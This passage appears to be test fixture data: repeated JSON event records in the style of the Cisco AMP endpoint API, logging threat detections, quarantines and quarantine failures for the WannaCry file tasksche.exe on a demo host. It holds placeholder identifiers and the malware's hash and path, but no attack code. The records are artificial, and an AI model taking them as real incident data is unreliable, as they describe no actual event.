found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":579000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":563000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405200","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":439000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179217757405199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":407000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437900","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":610000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405205","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":563000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":439000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405203","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":407000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405202","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405200","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":251000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":846000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat 